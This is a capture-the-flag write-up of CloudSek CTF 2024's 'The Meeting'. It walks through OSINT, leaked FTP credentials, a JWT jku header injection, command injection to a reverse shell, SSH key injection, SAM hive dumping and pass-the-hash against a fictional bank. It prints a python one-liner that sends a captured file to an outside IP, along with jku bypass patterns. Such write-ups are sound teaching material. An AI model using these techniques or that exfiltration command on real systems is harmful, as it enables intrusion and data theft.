CloudSek CTF 2024 Writeup

2 months ago 33
BOOK THIS SPACE FOR AD
ARTICLE AD

In the CTF challenge “The Meeting,” the task was to recover a decryption key hidden by an attacker who had encrypted essential data at Elsoncare Bank.

The challenge began with OSINT on Venkatesh, a security engineer at the bank, whose Twitter profile revealed an email address. This led to discovering leaked FTP credentials via epieos.com. Using these credentials, I accessed an FTP server, where a conversation file disclosed the domain cloudsek.ctf. An Nmap scan revealed open services, and after modifying the /etc/hosts file, I accessed the web portal. The portal contained a JWT header injection vulnerability, allowing account takeover that leads to command execution on the server. After exploiting this, I retrieved a capture.pcap file that hinted at SSH key additions on a Windows server. Then I generated SSH keys, and gained access to the Windows server. Inside, I located and exfiltrated the sam.hive and sys.hive files, used them to extract the NTLM hash of the Administrator, and successfully performed a pass-the-hash attack to obtain full control of the system, ultimately recovering the decryption key and completing the challenge.

The challenge began by identifying a key target: Venkatesh Ramkumar Naidu, a security engineer at Elsoncare Bank, who was known to be active on Twitter.

By locating his Twitter account, I found that his bio listed an email

address: 1999venky.naidu@gmail.com.

This piece of information became the starting point for further OSINT investigation. Search for Email Osint on Internet , gives a good tool Epios. Using Epieos, a specialized tool for email OSINT, I searched for information linked to this email address.

The tool revealed several Google services associated with the email, like Google Maps , Google Calender , etc.

On calendar one event is available names as Add Files To The Server.

In the event descriptions on the calendar, I discovered plaintext credentials for an FTP server:

FTP login Details
IP: 13.234.84.19
User: venknai
Password: xywwov-2zirBi-honqob

These credentials provided direct access to the FTP server within Elsoncare Bank’s infrastructure. With the FTP credentials in hand

Try to connect to the FTP server.

The successful login indicated that the credentials were still valid. The server allowed access to a file named conversation.txt.

conversation.txt file contained a discussion between Venknai and another individual referred to as Spidey.

The conversation revealed a domain name : cloudsek.ctf.

Running Nmap on IP: 13.234.84.19 Revealed port 21, 22, 80 Open for connection.

FTP-21

SSH-22

HTTP-80

Can’t access The http://13.234.84.19/ webserver Using IP address .Need To Set vhost as cloudsek.ctf

Configured the domain cloudsek.ctf to the FTP server’s IP address (13.234.84.19) by updating my /etc/hosts file.

Open The Url in browser http://cloudsek.ctf/ , Got Login Page of Bank’s Employee Portal.

In The Source Code the Page The Endpoint named as /s3cr3t is revealed in comment.

Checking that endpoint.

Seems like a Python code , more likely the source code of the WebApp.
Analyzing the code reveals Credentials of Guest Account.

line:38

Login As Guest While Intercepting in Burp.

Just Got “Welcome, guest” With An auth cookie.

Auth cookie Fetching JWT Headers from http://13.234.84.19/.well-known/jwk.json More Code Review Reveals a potential Remote Code Execution (RCE).

This code was designed to execute commands when the username was admin. It checked for the presence of a domain parameter and, if found, used os.system to run a curl command. This could execute any command injected via the domain parameter. In addition to the Python script, Reviewing the JWT token handling within the application. The JWT’s jku (JSON Web Key Set URL) header was expected to starts with http://13.234.84.19

line:57

This validation was intended to restrict token verification to server’s IP address. However, this check was vulnerable to manipulation. By crafting a custom JWT with a different jku value, I could bypass the server’s restriction and control the token validation process.

eg: http://13.234.84.19.mydomain.com/.well-known/jwk.json or http://13.234.84.19@IP.IP.IP.IP/.well-known/jwk.json

After Setting my burp collaborator domain in jku as above method , i got a call back from server.

The server is try Fetch The JWT Headers from my IP. We Have Potential Broken Authentication which can give us admin account access. I utilized jwt_tool utility to exploit the vulnerability.

run this command and follow along

python3 jwt_tool.py [Guesta-Account-cookie] [-X s : for exploit and spoof] [-ju: The Attacker's Webserver URL]

This Gaves us The JWK headers and a signed cookie of admin user.

I set up The flask server to serve the jwk headers. with application/json content-type header.

1. from flask import Flask, jsonify
2. app = Flask(__name__)
3. @app.route('/.well-known/jwk.json', methods=['GET'])
4. def get_jwk():
5. jwk_response = {
6. "mykeys": [
7. {
8. "alg": "RS256",
9. "use": "sig",
10. "kty": "RSA",
11. "kid": "jwt_tool",
12. "use": "sig",
13. "e": "AQAB",
14. "n": "uG6uq9Lf4z5nmrsA1byd-ydNm06m9XFP-eHaZxoK7ohqgyAlgK3jNn4bBBHmlBSqV2m6_x-U
EEMgkIYoGtiJoeKPXaDWqIdILDRirVW61048l0EPxQLc_PmB9tVtMR1QTIn19iQdROQYmeYZDHvLhIEl2T7Hlw
7auHsIdIrx6FlBxoA8ZhlsnorI8vppdPBXluZja-xeh7hDil5wVPVPf0PsITWmTYhdKdhjmsWG6Q"
15. }
16. ]
17. }
18. return jsonify(jwk_response)
19.
20. if __name__ == '__main__':
21. app.run(host='0.0.0.0', port=80)

We are good to go. we have admin cookie from the jwt_tool.

Change the older auth cookie to our manupulated one in Burp.

We got admin access , so i mentioned before we have RCE through domain parameter.

The Backend Server is running by appuser . To get Reverse shell , i utilize python oneliner command.

We got access on the server as appuser.

After Enumerating further , got a capture.pcap file in user’s home directory.

Lets get it to our machine , there’s no netcat on the server so i transfer the file using python3 cmd script.

python3 -c 'import socket; s = socket.socket(); s.connect(("4.188.73.150", 15913)); f = open("/home/appuser/capture.pcap", "rb"); s.sendall(f.read()); f.close(); s.close()'

After obtaining the capture.pcap file, I used Wireshark to analyze the network traffic.

During the analysis of the capture.pcap file, I observed network

traffic indicative of an SSH management server. Specifically,

I found HTTP requests sent to http://3.110.26.116/addkey, which included parameters for adding SSH keys. The format of these requests was:

This revealed that the server was set up to manage SSH keys via HTTP requests, allowing new keys to be added for the ncv user. This information was crucial for gaining further access to the compromised system.

Create Keys for User ncv using ssh-keygen and try add it to the server using curl.

ssh-keygen -f ncv -t rsa

We Can’t request the server from our machine , we need to utilized the compromised webServer.

Url encode the generated ssh public key.

run this curl command to add those keys to the ssh server, but run it on webserver’s reverse shell

curl -s 'http://3.110.26.116/addkey?usr=ncv&key=URL-ENCODE-KEY'

As response indicated Key added successfully.

Lets SSH into the server.

ssh ncv@3.110.26.116 -i ncv

There’s Only two accounts present on the server.

ncv and administrator.

After enumerating a lil bit . root.txt is present in admin’s desktop also ssh keys in .ssh folder of admin , but we cant access them as ncv user.

The sam.hive and sys.hive is present in the Temp Directory of ncv User.

Might Be the Backup of sam and sys database hives.

Lets get on those files our machine but first we need to transfer netcat on the windows SSH server.

Now use impacket’s secretsdump tool to dump ntlm hashes from these files.

In the “The Meeting” CTF challenge, I systematically addressed the ransomware attack on Elsoncare Bank by exploiting multiple vulnerabilities:

1. Initial Reconnaissance: I began by gathering OSINT on Venkatesh, a security engineer at the bank. This led me to his email and further discoveries, including an FTP server where I obtained crucial internal credentials.

2. Access To FTP Server: Accessing the FTP server with the leaked credentials allowed me to find sensitive data, including internal communications that pointed me towards the cloudsek.ctf domain.

3. Web Exploitation: On this domain, I discovered a command injection vulnerability through a hidden s3cr3t page. This flaw allowed me to execute arbitrary commands on the server. Analyzing the Python script on the server revealed that it was vulnerable to command injection. This vulnerability was exploited to run commands and further probe the server.

4. Analyzing Network Traffic: The capture.pcap file revealed an SSH management server at 3.110.26.116. The analysis showed that SSH keys could be added through HTTP requests to the server.

5. Accessing the SSH Management Server: By exploiting the identified SSH key management endpoint, I added my SSH key to the ncv user account. This allowed me to gain SSH access to the internal server.

6. Accessing SAM and SYSTEM Files: Once logged into the server as ncv, I located the sam.hive and system.hive files in the user’s temporary directory. I transferred these files to my local machine for further analysis. Using the impacket-secretsdump tool, I extracted NTLM hashes from the sam.hive file. This provided me with the necessary credentials for further exploitation.

7. PrivEsc to Administrator: With the NTLM hashes, I performed a pass-the-hash attack using evil-winrm to gain access as an administrator. This granted me full control over the server. Through these methodical steps, I successfully navigated the vulnerabilities, recovered critical data, and completed the challenge by securing access to the system.

Read Entire Article